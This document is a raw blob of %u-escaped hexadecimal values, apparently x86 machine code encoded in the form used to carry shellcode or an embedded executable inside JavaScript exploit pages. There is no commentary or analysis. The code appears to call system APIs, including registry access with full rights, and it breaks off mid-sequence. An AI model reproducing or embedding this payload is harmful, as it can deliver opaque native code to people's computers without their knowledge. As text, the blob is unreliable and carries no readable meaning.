c033%u7d8d%uabf0%uabab%u6aab%u6a32%u8d00%ubc45%ue850%u2c84%u0000%uc483%u6a0c%u6803%u947c%u0040%u326a%u458d%u50bc%u09e8%u0005%u8300%u10c4%u506a%u858d%uff60%uffff%uff50%u1c15%u4081%u8300%ufff8%u0475%uc033%u71eb%u858d%uff60%uffff%uff50%u4015%u4081%u8900%ub445%u7d83%u00b4%u0475%uc033%u57eb%u458b%u8bb4%u0c40%u008b%u4589%u6ab8%u8bff%ub845%u30ff%u15ff%u8124%u0040%u6a50%u8d10%uf045%ue850%u02e9%u0000%uc483%u8d10%uf045%uc085%u0475%uc033%u25eb%uff6a%u458d%u50f0%u326a%u458d%u50bc%ucae8%u0002%u8300%u10c4%u326a%u458d%u50bc%u75ff%ue808%u01f4%u0000%uc483%u5f0c%uc3c9%u8b55%u81ec%u40ec%u0001%u8300%uc0a5%ufffe%u00ff%u326a%u006a%u858d%ufec4%uffff%ue850%u2bc0%u0000%uc483%u6a0c%u6803%u9480%u0040%u326a%u858d%ufec4%uffff%ue850%u0442%u0000%uc483%u6810%u0105%u0000%u006a%u858d%ufef8%uffff%ue850%u2b92%u0000%uc483%u680c%u0105%u0000%u858d%ufef8%uffff%u6a50%uff00%u2415%u4080%u8500%u75c0%u6a31%u68ff%u9484%u0040%u326a%u858d%ufec4%uffff%ue850%u0235%u0000%uc483%u6a10%u8d32%uc485%ufffe%u50ff%u75ff%ue808%u015c%u0000%uc483%ue90c%u0152%u0000%u858d%ufec0%uffff%u6850%u003f%u000f%u006a%u8868%u4094%u6800%u0002%u8000%u15ff%u8004%u0040%uc085%u3174%uff6a%ub868%u4094%u6a00%u8d32%uc485%ufffe%u50ff%ue2e8%u0001%u8300%u10c4%u326a%u858d%ufec4%uffff%uff50%u0875%u09e8%u0001%u8300%u0cc4%uffe9%u0000%u6800%u94bc%u0040%ub5ff%ufec0%uffff%u15ff%u8000%u0040%uc085%u3d74%ub5ff%ufec0%uffff%u15ff%u800c%u0040%uff6a%uc468%u4094%u6a00%u8d32%uc485%ufffe%u50ff%u90e8%u0001%u8300%u10c4%u326a%u858d%ufec4%uffff%uff50%u0875%ub7e8%u0000%u8300%u0cc4%uade9%u0000%uff00%uc0b5%ufffe%uffff%u0c15%u4080%u8500%u74c0%u6a2e%u68ff%u94c8%u0040%u326a%u858d%ufec4%uffff%ue850%u014f%u0000%uc483%u6a10%u8d32%uc485%ufffe%u50ff%u75ff%ue808%u0076%u0000%uc483%ueb0c%u6a6f%u6a04%u8d00%uf885%ufffe%u50ff%u15ff%u8044%u0040%uc085%u2e75%uff6a%ucc68%u4094%u6a00%u8d32%uc485%ufffe%u50ff%u0ce8%u0001%u8300%u10c4%u326a%u858d%ufec4%uffff%uff50%u0875%u33e8%u0000%u8300%u0cc4%u2ceb%uff6a%ud068%u4094%u6a00%u8d32%uc485%ufffe%u50ff%udee8%u0000%u8300%u10c4%u326a%u858d%ufec4%uffff%uff50%u0875%u05e8%u0000%u8300%u0cc4%uc3c9%u8b55%u81ec%ua4ec%u0000%u5600%ube57%u94d4%u0040%ubd8d%uff5c%uffff%ua5a5%ua5a5%u6aa4%u6a64%u8d00%u9045%ue850%u29ca%u0000%uc483%u6a0c%u5908%uc033%ubd8d%uff70%uffff%uabf3%u116a%u858d%uff5c%uffff%ue850%uf7c6%uffff%u5959%uff6a%u858d%uff5c%uffff%u6a50%u8d64%u9045%ue850%u0069%u0000%uc483%u6a10%uffff%u0c75%u646a%u458d%u5090%u56e8%u0000%u8300%u10c4%uff6a%ue868%u4094%u6a00%u8d64%u9045%ue850%u0041%u0000%uc483%u6a10%u6a00%u8d64%u9045%uff50%u0875%u15ff%u8144%u0040%uf883%u75ff%u3304%uebc0%u6a20%u6a00%u8d20%u7085%uffff%u50ff%u75ff%uff08%u3415%u4081%u8900%ufc45%u7d83%u20fc%ue374%uc033%u5f40%uc95e%u8bc3%u55ff%uec8b%u4d8b%u8b14%u0855%u3353%u56db%u3b57%u75cb%u3b10%u75d3%u3910%u0c5d%u1275%uc033%u5e5f%u5d5b%u3bc3%u74d3%u8b07%u0c7d%ufb3b%u1b77%u31e8%u0007%u6a00%u5e16%u3089%u5353%u5353%ue853%u06ba%u0000%uc483%u8b14%uebc6%u8bd5%u1075%ucb3b%u0874%uf33b%u0475%u1a88%ud6eb%uc28b%u1838%u0474%u4f40%uf875%ufb3b%uee74%uf983%u75ff%u8a0f%u880e%u4008%u3a46%u74cb%u4f22%uf375%u1deb%ucb3b%u1276%u0e8a%u0888%u4640%ucb3a%u0874%u744f%uff05%u144d%uee75%u5d39%u7514%u8802%u3b18%u75fb%u8381%u147d%u75ff%u8b0f%u0c45%u506a%u5c88%uff02%ue958%uff6e%uffff%u1a88%uade8%u0006%u6a00%u5922%u0889%uf18b%u75e9%uffff%uccff%ucccc%ucccc%ucccc%ucccc%u4c8b%u0824%u5357%u8a56%u8b11%u247c%u8410%u74d2%u8a6f%u0171%uf684%u5574%uf78b%u4c8b%u1424%u078a%uc683%u3a01%u74c2%u8417%u74c0%u8a0d%u8306%u01c6%uc23a%u0a74%uc084%uf375%u5b5e%u335f%uc3c0%u068a%uc683%u3a01%u75c6%u8de9%uff7e%u618a%u8402%u74e4%u8a28%u8306%u02c6%uc43a%ube75%u418a%u8403%u74c0%u8a18%uff66%uc183%u3a02%u74c4%uebdf%u33ab%u5ec0%u5f5b%uc28a%u4de9%u0006%u8d00%uff47%u5b5e%uc35f%uc78b%u5b5e%uc35f%uff8b%u8b55%u8bec%u0845%u3353%u56db%u3b57%u74c3%u8b07%u0c7d%ufb3b%u1b77%uf5e8%u0005%u6a00%u5e16%u3089%u5353%u5353%ue853%u057e%u0000%uc483%u8b14%uebc6%u8b3c%u1075%uf33b%u0475%u1888%udaeb%ud08b%u1a38%u0474%u4f42%uf875%ufb3b%uee74%u0e8a%u0a88%u4642%ucb3a%u0374%u754f%u3bf3%u75fb%u8810%ue818%u05ae%u0000%u226a%u8959%u8b08%uebf1%u33b5%u5fc0%u5b5e%uc35d%uff8b%u8b55%u53ec%u8b56%u0875%udb33%u3957%u145d%u1075%uf33b%u1075%u5d39%u750c%u3312%u5fc0%u5b5e%uc35d%uf33b%u0774%u7d8b%u3b0c%u77fb%ue81b%u056c%u0000%u166a%u895e%u5330%u5353%u5353%uf5e8%u0004%u8300%u14c4%uc68b%ud5eb%u5d39%u7514%u8804%ueb1e%u8bca%u1055%ud33b%u0475%u1e88%ud1eb%u7d83%uff14%uc68b%u0f75%u0a8a%u0888%u4240%ucb3a%u1e74%u754f%uebf3%u8a19%u880a%u4008%u3a42%u74cb%u4f08%u0574%u4dff%u7514%u39ee%u145d%u0275%u1888%ufb3b%u8b75%u7d83%uff14%u0f75%u458b%u6a0c%u8850%u065c%u58ff%u78e9%uffff%u88ff%ue81e%u04f2%u0000%u226a%u8959%u8b08%uebf1%u8b82%u55ff%uec8b%u458b%u5608%uf18b%u46c6%u000c%uc085%u6375%u86e8%u0012%u8900%u0846%u488b%u896c%u8b0e%u6848%u4e89%u8b04%u3b0e%u880d%u40a7%u7400%u8b12%ua40d%u40a6%u8500%u7048%u0775%u21e8%u000f%u8900%u8b06%u0446%u053b%ua5a8%u0040%u1674%u468b%u8b08%ua40d%u40a6%u8500%u7048%u0875%u95e8%u0007%u8900%u0446%u468b%uf608%u7040%u7502%u8314%u7048%uc602%u0c46%ueb01%u8b0a%u8908%u8b0e%u0440%u4689%u8b04%u5ec6%uc25d%u0004%uff8b%u8b55%u83ec%u10ec%uff53%u1075%u4d8d%ue8f0%uff65%uffff%udb33%u5d39%u7508%ue82e%u0442%u0000%u5353%u5353%uc753%u1600%u0000%ue800%u03ca%u0000%uc483%u3814%ufc5d%u0774%u458b%u83f8%u7060%ub8fd%uffff%u7fff%uc7e9%u0000%u5600%u758b%u3b0c%u75f3%ue82e%u040c%u0000%u5353%u5353%uc753%u1600%u0000%ue800%u0394%u0000%uc483%u3814%ufc5d%u0774%u458b%u83f8%u7060%ub8fd%uffff%u7fff%u90e9%u0000%u5700%u7d8b%u39f4%u085f%u1075%uff56%u0875%u69e8%u0014%u5900%ue959%u0081%u0000%u458b%u6608%ub60f%uff00%u0845%ub70f%u0fc8%uc1b6%u44f6%u1d38%u7404%u8b1d%u0845%u008a%uc33a%u0475%uc933%u10eb%ue1c1%u6608%ub60f%u66c0%uc80b%u45ff%u0f08%uc9b7%u0f66%u06b6%ub70f%u0fc0%ud0b6%uf646%u3a44%u041d%u1874%u168a%ud33a%u0475%uc033%u0eeb%ue0c1%u6608%ub60f%u66d2%uc20b%ub70f%u46c0%u3b66%u75c1%u6618%ucb3b%u9875%u5d38%u74fc%u8b07%uf845%u6083%ufd70%uc033%u5e5f%uc95b%u1bc3%u83c0%u02e0%u3848%ufc5d%uf074%u4d8b%u83f8%u7061%uebfd%u8be7%u55ff%uec8b%u006a%u75ff%uff0c%u0875%uc7e8%ufffe%u83ff%u0cc4%uc35d%uff8b%u8b55%u83ec%u683d%u40ac%u0200%u0574%u64e8%u0019%uff00%u0875%ub1e8%u0017%u6800%u00ff%u0000%uf3e8%u0014%u5900%u5d59%u6ac3%u6814%u9560%u0040%u17e8%u0022%ub800%u5a4d%u0000%u3966%u0005%u4000%u7500%ua138%u003c%u0040%ub881%u0000%u0040%u4550%u0000%u2775%u0bb9%u0001%u6600%u8839%u0018%u0040%u1975%ub883%u0074%u0040%u760e%u3310%u39c9%ue888%u4000%u0f00%uc195%u4d89%uebe4%u8304%ue465%u6a00%ue801%u2195%u0000%u8559%u75c0%u6a08%ue81c%uff6e%uffff%ue859%u118a%u0000%uc085%u0875%u106a%u5de8%uffff%u59ff%u26e8%u0021%u8300%ufc65%ue800%u1ec9%u0000%uc085%u087d%u1b6a%u07e8%u0014%u5900%u15ff%u8068%u0040%uf8a3%u40b7%ue800%u1d76%u0000%u60a3%u40ac%ue800%u1cb1%u0000%uc085%u087d%u086a%ue1e8%u0013%u5900%u28e8%u001a%u8500%u7dc0%u6a08%ue809%u13d0%u0000%u6a59%ue801%u1487%u0000%u8559%u74c0%u5007%ubde8%u0013%u5900%ud0a1%u40ac%ua300%uacd4%u0040%uff50%uc835%u40ac%uff00%uc435%u40ac%ue800%ueff8%uffff%uc483%u890c%ue045%u7d83%u00e4%u0675%ue850%u15fe%u0000%u25e8%u0016%ueb00%u8b2e%uec45%u088b%u098b%u4d89%u50dc%ue851%u1863%u0000%u5959%u8bc3%ue865%u458b%u89dc%ue045%u7d83%u00e4%u0675%ue850%u15e4%u0000%u04e8%u0016%uc700%ufc45%ufffe%uffff%u458b%ue8e0%u2117%u0000%ue8c3%u22b8%u0000%ua4e9%ufffe%u8bff%u55ff%uec8b%u458b%ua308%uac6c%u0040%uc35d%uff8b%u8b55%u81ec%u28ec%u0003%ua100%ua8b4%u0040%uc533%u4589%u83fc%ud8a5%ufffc%u00ff%u6a53%u8d4c%udc85%ufffc%u6aff%u5000%u2be8%u0023%u8d00%ud885%ufffc%u89ff%u2885%ufffd%u8dff%u3085%ufffd%u83ff%u0cc4%u8589%ufd2c%uffff%u8589%ufde0%uffff%u8d89%ufddc%uffff%u9589%ufdd8%uffff%u9d89%ufdd4%uffff%ub589%ufdd0%uffff%ubd89%ufdcc%uffff%u8c66%uf895%ufffd%u66ff%u8d8c%ufdec%uffff%u8c66%uc89d%ufffd%u66ff%u858c%ufdc4%uffff%u8c66%uc0a5%ufffd%u66ff%uad8c%ufdbc%uffff%u8f9c%uf085%ufffd%u8bff%u0445%u4d8d%uc704%u3085%ufffd%u01ff%u0100%u8900%ue885%ufffd%u89ff%uf48d%ufffd%u8bff%ufc49%u8d89%ufde4%uffff%u85c7%ufcd8%uffff%u0417%uc000%u85c7%ufcdc%uffff%u0001%u0000%u8589%ufce4%uffff%u15ff%u802c%u0040%u006a%ud88b%u15ff%u8078%u0040%u858d%ufd28%uffff%uff50%u7415%u4080%u8500%u75c0%u850c%u75db%u6a08%ue802%u2232%u0000%u6859%u0417%uc000%u15ff%u8070%u0040%uff50%u6c15%u4080%u8b00%ufc4d%ucd33%ue85b%u221c%u0000%uc3c9%uff8b%u8b55%uffec%u6c35%u40ac%ue800%u0bc1%u0000%u8559%u74c0%u5d03%ue0ff%u026a%uf3e8%u0021%u5900%ue95d%ufeb2%uffff%uff8b%u8b55%u8bec%u0845%uc933%u043b%u08cd%u40a0%u7400%u4113%uf983%u722d%u8df1%ued48%uf983%u7711%u6a0e%u580d%uc35d%u048b%u0ccd%u40a0%u5d00%u05c3%uff44%uffff%u0e6a%u3b59%u1bc8%u23c0%u83c1%u08c0%uc35d%u37e8%u000d%u8500%u75c0%ub806%ua170%u0040%u83c3%u08c0%uccc3%ucccc%ucccc%u428d%u5bff%u8dc3%u24a4%u0000%u0000%u648d%u0024%uc033%u448a%u0824%u8b53%uc1d8%u08e0%u548b%u0824%uc2f7%u0003%u0000%u1574%u0a8a%uc283%u3a01%u74cb%u84cf%u74c9%uf751%u03c2%u0000%u7500%u0beb%u57d8%uc38b%ue3c1%u5610%ud80b%u0a8b%uffbf%ufefe%u8b7e%u8bc1%u33f7%u03cb%u03f0%u83f9%ufff1%uf083%u33ff%u33cf%u83c6%u04c2%ue181%u0100%u8101%u1c75%u0025%u0101%u7481%u25d3%u0100%u0101%u0875%ue681%u0000%u8000%uc475%u5f5e%u335b%uc3c0%u428b%u3afc%u74c3%u8436%u74c0%u3aef%u74e3%u8427%u74e4%uc1e7%u10e8%uc33a%u1574%uc084%udc74%ue33a%u0674%ue484%ud474%u96eb%u5f5e%u428d%u5bff%u8dc3%ufe42%u5f5e%uc35b%u428d%u5efd%u5b5f%u8dc3%ufc42%u5f5e%uc35b%ua42d%u0003%u7400%u8322%u04e8%u1774%ue883%u740d%u480c%u0374%uc033%ub8c3%u0404%u0000%ub8c3%u0412%u0000%ub8c3%u0804%u0000%ub8c3%u0411%u0000%u8bc3%u56ff%u8b57%u68f0%u0101%u0000%uff33%u468d%u571c%ue850%u209c%u0000%uc033%ub70f%u8bc8%u89c1%u047e%u7e89%u8908%u0c7e%ue1c1%u0b10%u8dc1%u107e%uabab%ub9ab%ua180%u0040%uc483%u8d0c%u1c46%uce2b%u01bf%u0001%u8a00%u0114%u1088%u4f40%uf775%u868d%u011d%u0000%u00be%u0001%u8a00%u0814%u1088%u4e40%uf775%u5e5f%u8bc3%u55ff%uec8b%uec81%u051c%u0000%ub4a1%u40a8%u3300%u89c5%ufc45%u5753%u858d%ufae8%uffff%uff50%u0476%u15ff%u807c%u0040%u00bf%u0001%u8500%u0fc0%ufb84%u0000%u3300%u88c0%u0584%ufefc%uffff%u3b40%u72c7%u8af4%uee85%ufffa%uc6ff%ufc85%ufffe%u20ff%uc084%u2e74%u9d8d%ufaef%uffff%ub60f%u0fc8%u03b6%uc83b%u1677%uc12b%u5040%u948d%ufc0d%ufffe%u6aff%u5220%ud9e8%u001f%u8300%u0cc4%u8a43%u4303%uc084%ud875%u006a%u76ff%u8d0c%ufc85%ufffa%uffff%u0476%u5750%u858d%ufefc%uffff%u6a50%u6a01%ue800%u25ec%u0000%udb33%uff53%u0476%u858d%ufdfc%uffff%u5057%u8d57%ufc85%ufffe%u50ff%uff57%u0c76%ue853%u23cd%u0000%uc483%u5344%u76ff%u8d04%ufc85%ufffc%u57ff%u5750%u858d%ufefc%uffff%u6850%u0200%u0000%u76ff%u530c%ua8e8%u0023%u8300%u24c4%uc033%ub70f%u458c%ufafc%uffff%uc1f6%u7401%u800e%u064c%u101d%u8c8a%ufc05%ufffd%uebff%uf611%u02c1%u1574%u4c80%u1d06%u8a20%u058c%ufcfc%uffff%u8c88%u1d06%u0001%ueb00%uc608%u0684%u011d%u0000%u4000%uc73b%ube72%u56eb%u868d%u011d%u0000%u85c7%ufae4%uffff%uff9f%uffff%uc933%u8529%ufae4%uffff%u958b%ufae4%uffff%u848d%u1d0e%u0001%u0300%u8dd0%u205a%ufb83%u7719%u800c%u0e4c%u101d%ud18a%uc280%ueb20%u830f%u19fa%u0e77%u4c80%u1d0e%u8a20%u80d1%u20ea%u1088%u03eb%u00c6%u4100%ucf3b%uc272%u4d8b%u5ffc%ucd33%ue85b%u1ea8%u0000%uc3c9%u0c6a%u8068%u4095%ue800%u1c10%u0000%u98e8%u000a%u8b00%ua1f8%ua6a4%u0040%u4785%u7470%u831d%u6c7f%u7400%u8b17%u6877%uf685%u0875%u206a%u63e8%u000e%u5900%uc68b%u28e8%u001c%uc300%u0d6a%u77e8%u0026%u5900%u6583%u00fc%u778b%u8968%ue475%u353b%ua5a8%u0040%u3674%uf685%u1a74%uff56%u8415%u4080%u8500%u75c0%u810f%u80fe%u40a1%u7400%u5607%u7ae8%u0026%u5900%ua8a1%u40a5%u8900%u6847%u358b%ua5a8%u0040%u7589%u56e4%u15ff%u8080%u0040%u45c7%ufefc%uffff%ue8ff%u0005%u0000%u8eeb%u758b%u6ae4%ue80d%u253c%u0000%uc359%uff8b%u8b55%u83ec%u10ec%u3353%u53db%u4d8d%ue8f0%uf753%uffff%u1d89%uac70%u0040%ufe83%u75fe%uc71e%u7005%u40ac%u0100%u0000%uff00%u8c15%u4080%u3800%ufc5d%u4574%u4d8b%u83f8%u7061%uebfd%u833c%ufdfe%u1275%u05c7%uac70%u0040%u0001%u0000%u15ff%u8088%u0040%udbeb%ufe83%u75fc%u8b12%uf045%u408b%uc704%u7005%u40ac%u0100%u0000%ueb00%u38c4%ufc5d%u0774%u458b%u83f8%u7060%u8bfd%u5bc6%uc3c9%uff8b%u8b55%u83ec%u20ec%ub4a1%u40a8%u3300%u89c5%ufc45%u8b53%u0c5d%u8b56%u0875%ue857%uff64%uffff%uf88b%uf633%u7d89%u3b08%u75fe%u8b0e%ue8c3%ufcb7%uffff%uc033%u9de9%u0001%u8900%ue475%uc033%ub839%ua5b0%u0040%u840f%u0091%u0000%u45ff%u83e4%u30c0%uf03d%u0000%u7200%u81e7%ue8ff%u00fd%u0f00%u7084%u0001%u8100%ue9ff%u00fd%u0f00%u6484%u0001%u0f00%uc7b7%uff50%u9015%u4080%u8500%u0fc0%u5284%u0001%u8d00%ue845%u5750%u15ff%u807c%u0040%uc085%u840f%u0133%u0000%u0168%u0001%u8d00%u1c43%u5056%uf9e8%u001c%u3300%u42d2%uc483%u890c%u047b%u7389%u390c%ue855%u860f%u00f8%u0000%u7d80%u00ee%u840f%u00cf%u0000%u758d%u8aef%u840e%u0fc9%uc284%u0000%u0f00%u46b6%u0fff%uc9b6%ua6e9%u0000%u6800%u0101%u0000%u438d%u561c%ue850%u1cb2%u0000%u4d8b%u83e4%u0cc4%uc96b%u8930%ue075%ub18d%ua5c0%u0040%u7589%uebe4%u8a2a%u0146%uc084%u2874%ub60f%u0f3e%uc0b6%u12eb%u458b%u8ae0%uac80%u40a5%u0800%u3b44%u0f1d%u46b6%u4701%uf83b%uea76%u7d8b%u4608%u8046%u003e%ud175%u758b%uffe4%ue045%uc683%u8308%ue07d%u8904%ue475%ue972%uc78b%u7b89%uc704%u0843%u0001%u0000%u67e8%ufffb%u6aff%u8906%u0c43%u438d%u8d10%ub489%u40a5%u5a00%u8b66%u4131%u8966%u4130%u4040%u754a%u8bf3%ue8f3%ufbd7%uffff%ub7e9%ufffe%u80ff%u034c%u041d%u3b40%u76c1%u46f6%u8046%uff7e%u0f00%u3485%uffff%u8dff%u1e43%ufeb9%u0000%u8000%u0808%u4940%uf975%u438b%ue804%ufb12%uffff%u4389%u890c%u0853%u03eb%u7389%u3308%u0fc0%uc8b7%uc18b%ue1c1%u0b10%u8dc1%u107b%uabab%uebab%u39a8%u7035%u40ac%u0f00%u5885%ufffe%u83ff%uffc8%u4d8b%u5ffc%u335e%u5bcd%ua3e8%u001b%uc900%u6ac3%u6814%u95a0%u0040%u0be8%u0019%u8300%ue04d%ue8ff%u078f%u0000%uf88b%u7d89%ue8dc%ufcdc%uffff%u5f8b%u8b68%u0875%u75e8%ufffd%u89ff%u0845%u433b%u0f04%u5784%u0001%u6800%u0220%u0000%u34e8%u0024%u5900%ud88b%udb85%u840f%u0146%u0000%u88b9%u0000%u8b00%u6877%ufb8b%ua5f3%u2383%u5300%u75ff%ue808%ufdb8%uffff%u5959%u4589%u85e0%u0fc0%ufc85%u0000%u8b00%udc75%u76ff%uff68%u8415%u4080%u8500%u75c0%u8b11%u6846%u803d%u40a1%u7400%u5007%u56e8%u0023%u5900%u5e89%u5368%u3d8b%u8080%u0040%ud7ff%u46f6%u0270%u850f%u00ea%u0000%u05f6%ua6a4%u0040%u0f01%udd85%u0000%u6a00%ue80d%u22f8%u0000%u8359%ufc65%u8b00%u0443%u80a3%u40ac%u8b00%u0843%u84a3%u40ac%u8b00%u0c43%u88a3%u40ac%u3300%u89c0%ue445%uf883%u7d05%u6610%u4c8b%u1043%u8966%u450c%uac74%u0040%ueb40%u33e8%u89c0%ue445%u013d%u0001%u7d00%u8a0d%u184c%u881c%ua088%u40a3%u4000%ue9eb%uc033%u4589%u3de4%u0100%u0000%u107d%u8c8a%u1d18%u0001%u8800%ua888%u40a4%u4000%ue6eb%u35ff%ua5a8%u0040%u15ff%u8084%u0040%uc085%u1375%ua8a1%u40a5%u3d00%ua180%u0040%u0774%ue850%u229d%u0000%u8959%ua81d%u40a5%u5300%ud7ff%u45c7%ufefc%uffff%ue8ff%u0002%u0000%u30eb%u0d6a%u71e8%u0021%u5900%uebc3%u8325%ufff8%u2075%ufb81%ua180%u0040%u0774%ue853%u2267%u0000%ue859%uf86a%uffff%u00c7%u0016%u0000%u04eb%u6583%u00e0%u458b%ue8e0%u17c3%u0000%u83c3%uec3d%u40b7%u0000%u1275%ufd6a%u56e8%ufffe%u59ff%u05c7%ub7ec%u0040%u0001%u0000%uc033%u8bc3%u55ff%uec8b%u5653%u758b%u8b08%ubc86%u0000%u3300%u57db%uc33b%u6f74%ua83d%u40aa%u7400%u8b68%ub086%u0000%u3b00%u74c3%u395e%u7518%u8b5a%ub886%u0000%u3b00%u74c3%u3917%u7518%u5013%ueee8%u0021%uff00%ubcb6%u0000%ue800%u252a%u0000%u5959%u868b%u00b4%u0000%uc33b%u1774%u1839%u1375%ue850%u21cd%u0000%ub6ff%u00bc%u0000%uc4e8%u0024%u5900%uff59%ub0b6%u0000%ue800%u21b5%u0000%ub6ff%u00bc%u0000%uaae8%u0021%u5900%u8b59%uc086%u0000%u3b00%u74c3%u3944%u7518%u8b40%uc486%u0000%u2d00%u00fe%u0000%ue850%u2189%u0000%u868b%u00cc%u0000%u80bf%u0000%u2b00%u50c7%u76e8%u0021%u8b00%ud086%u0000%u2b00%u50c7%u68e8%u0021%uff00%uc0b6%u0000%ue800%u215d%u0000%uc483%u8d10%ud4be%u0000%u8b00%u3d07%ua9e8%u0040%u1774%u9839%u00b4%u0000%u0f75%ue850%u22aa%u0000%u37ff%u36e8%u0021%u5900%u8d59%u507e%u45c7%u0608%u0000%u8100%uf87f%ua6a8%u0040%u1174%u078b%uc33b%u0b74%u1839%u0775%ue850%u2111%u0000%u3959%ufc5f%u1274%u478b%u3b04%u74c3%u390b%u7518%u5007%ufae8%u0020%u5900%uc783%uff10%u084d%uc775%ue856%u20eb%u0000%u5f59%u5b5e%uc35d%uff8b%u8b55%u53ec%u8b56%u8035%u4080%u5700%u7d8b%u5708%ud6ff%u878b%u00b0%u0000%uc085%u0374%uff50%u8bd6%ub887%u0000%u8500%u74c0%u5003%ud6ff%u878b%u00b4%u0000%uc085%u0374%uff50%u8bd6%uc087%u0000%u8500%u74c0%u5003%ud6ff%u5f8d%uc750%u0845%u0006%u0000%u7b81%ua8f8%u40a6%u7400%u8b09%u8503%u74c0%u5003%ud6ff%u7b83%u00fc%u0a74%u438b%u8504%u74c0%u5003%ud6ff%uc383%uff10%u084d%ud675%u878b%u00d4%u0000%ub405%u0000%u5000%ud6ff%u5e5f%u5d5b%u8bc3%u55ff%uec8b%u8b57%u087d%uff85%u840f%u0083%u0000%u5653%u358b%u8084%u0040%uff57%u8bd6%ub087%u0000%u8500%u74c0%u5003%ud6ff%u878b%u00b8%u0000%uc085%u0374%uff50%u8bd6%ub487%u0000%u8500%u74c0%u5003%ud6ff%u878b%u00c0%u0000%uc085%u0374%uff50%u8dd6%u505f%u45c7%u0608%u0000%u8100%uf87b%ua6a8%u0040%u0974%u038b%uc085%u0374%uff50%u83d6%ufc7b%u7400%u8b0a%u0443%uc085%u0374%uff50%u83d6%u10c3%u4dff%u7508%u8bd6%ud487%u0000%u0500%u00b4%u0000%uff50%u5ed6%u8b5b%u5fc7%uc35d%uff85%u3774%uc085%u3374%u8b56%u3b30%u74f7%u5728%u3889%uc1e8%ufffe%u59ff%uf685%u1b74%ue856%uff45%uffff%u3e83%u5900%u0f75%ufe81%ua6b0%u0040%u0774%ue856%ufd59%uffff%u8b59%u5ec7%u33c3%uc3c0%u0c6a%uc068%u4095%ue800%u14a4%u0000%u2ce8%u0003%u8b00%ua1f0%ua6a4%u0040%u4685%u7470%u8322%u6c7e%u7400%ue81c%u0315%u0000%u708b%u856c%u75f6%u6a08%ue820%u06f2%u0000%u8b59%ue8c6%u14b7%u0000%u6ac3%ue80c%u1f06%u0000%u8359%ufc65%u8d00%u6c46%u3d8b%ua788%u0040%u69e8%uffff%u89ff%ue445%u45c7%ufefc%uffff%ue8ff%u0002%u0000%uc1eb%u0c6a%u01e8%u001e%u5900%u758b%uc3e4%uff8b%u8b55%u56ec%u35ff%ua79c%u0040%u358b%u8098%u0040%ud6ff%uc085%u2174%u98a1%u40a7%u8300%ufff8%u1774%uff50%u9c35%u40a7%uff00%uffd6%u85d0%u74c0%u8b08%uf880%u0001%ueb00%ube27%u8210%u0040%uff56%u9415%u4080%u8500%u75c0%u560b%u33e8%u0006%u5900%uc085%u1874%u0068%u4082%u5000%u15ff%u801c%u0040%uc085%u0874%u75ff%uff08%u89d0%u0845%u458b%u5e08%uc35d%u006a%u87e8%uffff%u59ff%u8bc3%u55ff%uec8b%uff56%u9c35%u40a7%u8b00%u9835%u4080%uff00%u85d6%u74c0%ua121%ua798%u0040%uf883%u74ff%u5017%u35ff%ua79c%u0040%ud6ff%ud0ff%uc085%u0874%u808b%u01fc%u0000%u27eb%u10be%u4082%u5600%u15ff%u8094%u0040%uc085%u0b75%ue856%u05b8%u0000%u8559%u74c0%u6818%u822c%u0040%uff50%u1c15%u4080%u8500%u74c0%uff08%u0875%ud0ff%u4589%u8b08%u0845%u5d5e%uffc3%u9c15%u4080%uc200%u0004%uff8b%uff56%u9c35%u40a7%uff00%u9815%u4080%u8b00%u85f0%u75f6%uff1b%ub435%u40ac%ue800%uff65%uffff%u8b59%u56f0%u35ff%ua79c%u0040%u15ff%u80a0%u0040%uc68b%uc35e%u98a1%u40a7%u8300%ufff8%u1674%uff50%ubc35%u40ac%ue800%uff3b%uffff%uff59%u83d0%u980d%u40a7%uff00%u9ca1%u40a7%u8300%ufff8%u0e74%uff50%ua415%u4080%u8300%u9c0d%u40a7%uff00%u3ee9%u001c%u6a00%u680c%u95e0%u0040%uc7e8%u0012%ube00%u8210%u0040%uff56%u9415%u4080%u8500%u75c0%u5607%uf9e8%u0004%u5900%u4589%u8be4%u0875%u46c7%u585c%u4088%u3300%u47ff%u7e89%u8514%u74c0%u6824%u8200%u0040%u8b50%u1c1d%u4080%uff00%u89d3%uf886%u0001%u6800%u822c%u0040%u75ff%uffe4%u89d3%ufc86%u0001%u8900%u707e%u86c6%u00c8%u0000%uc643%u4b86%u0001%u4300%u46c7%u8068%u40a1%u6a00%ue80d%u1cf2%u0000%u8359%ufc65%uff00%u6876%u15ff%u8080%u0040%u45c7%ufefc%uffff%ue8ff%u003e%u0000%u0c6a%ud1e8%u001c%u5900%u7d89%u8bfc%u0c45%u4689%u856c%u75c0%ua108%ua788%u0040%u4689%uff6c%u6c76%u01e8%ufffc%u59ff%u45c7%ufefc%uffff%ue8ff%u0015%u0000%u4ae8%u0012%uc300%uff33%u8b47%u0875%u0d6a%ub9e8%u001b%u5900%u6ac3%ue80c%u1bb0%u0000%uc359%uff8b%u5756%u15ff%u8018%u0040%u35ff%ua798%u0040%uf88b%u91e8%ufffe%uffff%u8bd0%u85f0%u75f6%u684e%u0214%u0000%u016a%u63e8%u001d%u8b00%u59f0%u8559%u74f6%u563a%u35ff%ua798%u0040%u35ff%uacb8%u0040%ue8e8%ufffd%u59ff%ud0ff%uc085%u1874%u006a%ue856%ufec5%uffff%u5959%u15ff%u80ac%u0040%u4e83%uff04%u0689%u09eb%ue856%u1c51%u0000%u3359%u57f6%u15ff%u80a8%u0040%u8b5f%u5ec6%u8bc3%u56ff%u7fe8%uffff%u8bff%u85f0%u75f6%u6a08%ue810%u03d6%u0000%u8b59%u5ec6%u6ac3%u6808%u9608%u0040%u4de8%u0011%u8b00%u0875%uf685%u840f%u00f8%u0000%u468b%u8524%u74c0%u5007%u04e8%u001c%u5900%u468b%u852c%u74c0%u5007%uf6e8%u001b%u5900%u468b%u8534%u74c0%u5007%ue8e8%u001b%u5900%u468b%u853c%u74c0%u5007%udae8%u001b%u5900%u468b%u8540%u74c0%u5007%ucce8%u001b%u5900%u468b%u8544%u74c0%u5007%ubee8%u001b%u5900%u468b%u8548%u74c0%u5007%ub0e8%u001b%u5900%u468b%u3d5c%u8858%u0040%u0774%ue850%u1b9f%u0000%u6a59%ue80d%u1b64%u0000%u8359%ufc65%u8b00%u687e%uff85%u1a74%uff57%u8415%u4080%u8500%u75c0%u810f%u80ff%u40a1%u7400%u5707%u72e8%u001b%u5900%u45c7%ufefc%uffff%ue8ff%u0057%u0000%u0c6a%u2be8%u001b%u5900%u45c7%u01fc%u0000%u8b00%u6c7e%uff85%u2374%ue857%ufaf3%uffff%u3b59%u883d%u40a7%u7400%u8114%ub0ff%u40a6%u7400%u830c%u00